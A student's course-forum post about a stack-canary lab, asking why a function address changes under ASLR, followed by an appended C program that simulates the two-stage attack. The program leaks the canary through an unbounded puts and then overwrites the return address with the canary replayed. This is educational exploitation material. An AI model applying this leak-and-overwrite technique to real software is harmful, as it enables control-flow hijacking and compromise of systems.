Hi all-
I went through the stack cookie module last night. I compiled the binary on a 64-bit system:
gcc -m32 --no-pie canary.c -o canary
I went through the slides and created the pwntools Python file to run the multistage exploit:
1 - the first buffer write leads to a leak of the stack canary (since the 0x00 byte becomes 0x0a from the newline and puts goes until it encounters a 0x00 byte) without overflowing the buffer
2 - the second buffer write overflows while writing the correct stack canary to the correct place in the buffer and overwrites what will become EIP with a hardcoded return address
In the slides the hardcoded return address is for the dead function getshell, obtained either through info functions or p getshell,
but when I run the exploit the prompt segfaults at the end. I determined that this is because the return address is wrong. Upon further inspection the address for getshell is different each time I run it in gdb.
This exercise is supposed to have the system ASLR enabled and it's not supposed to matter. Why is the address for getshell changing?
Thanks,
Steve
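The two-stage technique Steve describes (stage 1: fill the buffer exactly so the trailing newline replaces the canary's 0x00 byte and puts runs on into the canary; stage 2: replay the recovered canary and overwrite the saved return address), as an added example that is not part of the original post or the course material. It simulates a 32-bit little-endian stack frame in a C struct so it runs anywhere; the buffer size, canary value, saved EBP and the getshell address are constructed assumptions for the demo, not values from the real binary, and it does not address the ASLR question.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed stand-in for the 32-bit frame of the vulnerable function:
 * buffer, then canary, then saved EBP, then the return address.
 * Sizes and values are assumptions for the demo, not the real binary's layout. */
#define BUF_SIZE 16

struct frame {
    char     buf[BUF_SIZE];
    uint32_t canary;     /* glibc canaries keep the low byte 0x00; little-endian puts it first in memory */
    uint32_t saved_ebp;
    uint32_t ret_addr;
};

static const uint32_t DEMO_CANARY = 0x1a2b3c00u; /* assumed value; low byte is the 0x00 terminator */
static const uint32_t DEMO_EBP    = 0xffffd000u; /* assumed; its 0x00 low byte is where puts stops */
static const uint32_t ORIG_RET    = 0x08049100u; /* assumed */
static const uint32_t GETSHELL    = 0x08049200u; /* assumed stand-in for getshell in a non-PIE binary */

static void fresh_frame(struct frame *f) {
    memset(f->buf, 0, BUF_SIZE);
    f->canary = DEMO_CANARY; f->saved_ebp = DEMO_EBP; f->ret_addr = ORIG_RET;
}

/* The bug: copies len bytes from buf onward with no bound check. Written through the
 * frame base so the simulation stays well-defined C; in the target it is an unbounded
 * read into buf that spills over the canary and return address. */
static void vulnerable_read(struct frame *f, const unsigned char *in, size_t len) {
    if (len > sizeof *f) len = sizeof *f;
    memcpy((unsigned char *)f, in, len);
}

/* puts(buf) emulation: emit bytes from buf until the first 0x00 (bounded to the frame). */
static size_t leak_via_puts(const struct frame *f, unsigned char *out, size_t cap) {
    const unsigned char *p = (const unsigned char *)f;
    size_t n = 0;
    while (n < sizeof *f && n < cap && p[n] != 0) { out[n] = p[n]; n++; }
    return n;
}

/* Stage 1: exactly BUF_SIZE bytes plus the newline that lands on the canary's 0x00. */
static size_t stage1_leak(struct frame *f, unsigned char *out, size_t cap) {
    unsigned char in[BUF_SIZE + 1];
    memset(in, 'A', BUF_SIZE);
    in[BUF_SIZE] = '\n';
    vulnerable_read(f, in, sizeof in);
    return leak_via_puts(f, out, cap);
}

/* Reassemble the canary from the bytes after the padding and restore the 0x00 low byte. */
static uint32_t recover_canary(const unsigned char *leak, size_t n) {
    uint32_t c;
    if (n < BUF_SIZE + 4) return 0;          /* leak too short: newline did not reach the canary */
    memcpy(&c, leak + BUF_SIZE, 4);          /* little-endian reassembly */
    return c & 0xffffff00u;                  /* the 0x0a must become 0x00 again */
}

/* Stage 2 payload: padding | canary | saved EBP (junk) | new return address. */
static size_t stage2_payload(uint32_t canary, uint32_t target, unsigned char *out) {
    uint32_t ebp = 0x42424242u;              /* EBP contents do not matter for the return */
    memset(out, 'B', BUF_SIZE);
    memcpy(out + BUF_SIZE, &canary, 4);
    memcpy(out + BUF_SIZE + 4, &ebp, 4);
    memcpy(out + BUF_SIZE + 8, &target, 4);
    return BUF_SIZE + 12;
}

/* Stage 1 alone: what the attacker reconstructs from the leak. */
static uint32_t demo_recovered_canary(void) {
    struct frame f; unsigned char leak[sizeof f];
    fresh_frame(&f);
    return recover_canary(leak, stage1_leak(&f, leak, sizeof leak));
}

/* Both stages in the same process: 1 if the canary check would pass and EIP becomes GETSHELL. */
static int run_exploit_demo(void) {
    struct frame f; unsigned char leak[sizeof f]; unsigned char payload[sizeof f];
    fresh_frame(&f);
    uint32_t canary = recover_canary(leak, stage1_leak(&f, leak, sizeof leak));
    vulnerable_read(&f, payload, stage2_payload(canary, GETSHELL, payload));
    return f.canary == DEMO_CANARY && f.ret_addr == GETSHELL;
}

int main(void) {
    struct frame f; unsigned char leak[sizeof f];
    fresh_frame(&f);
    size_t n = stage1_leak(&f, leak, sizeof leak);
    printf("leaked %zu bytes, canary = 0x%08x\n", n, recover_canary(leak, n));
    printf("exploit %s\n", run_exploit_demo() ? "lands on GETSHELL" : "failed");
    return 0;
}
```

How far puts reads past the canary depends on the next 0x00 on the stack (here the saved EBP's low byte), so the leak length varies between frames; the only byte the attacker must repair is the one the newline clobbered, which is why recover_canary masks it back to 0x00 before the value is replayed.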